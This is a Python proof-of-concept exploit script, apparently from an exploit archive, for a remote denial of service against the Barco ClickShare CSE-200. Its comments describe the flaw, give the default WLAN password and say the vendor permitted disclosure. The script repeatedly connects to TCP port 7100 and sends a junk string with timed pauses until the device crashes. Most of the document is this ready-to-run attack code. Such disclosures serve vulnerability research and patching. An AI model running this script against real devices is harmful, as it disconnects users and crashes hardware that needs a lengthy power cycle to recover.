#!/usr/bin/python
# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
# Date: 11-04-2018
# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
# Exploit Author: Florian Hauser
# Contact: florian DOT g DOT hauser AT gmail DOT com
# CVE: requested by Barco
# Category: Hardware
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Florian Hauser is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Florian Hauser's
# responsibility.
#
# Use them at your own risk!
################
# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
# not only disconnects all clients but also results in a crash of this hardware device
# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
# I got permission from Barco to disclose this vulnerability.
# This affects potentially all other ClickShare products, Barco confirms
import socket
import sys
from time import sleep
if len(sys.argv) != 2:
print "Usage: exploit.py <ip>"
sys.exit(0)
# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
# 6-7 requests do the job usually
for x in range(1,50):
#Create a new socket each time because otherwise the service drops the socket
#Same request cannot be sent several times in sequence
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Connect to vulnerable TCP port 7100
connect=s.connect((str(sys.argv[1]), 7100))
s.send('some evil string \r\n\n')
print "Buffer " + str(x) + " sent...\n"
result=s.recv(1024)
print result
s.close()
#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
sleep(7)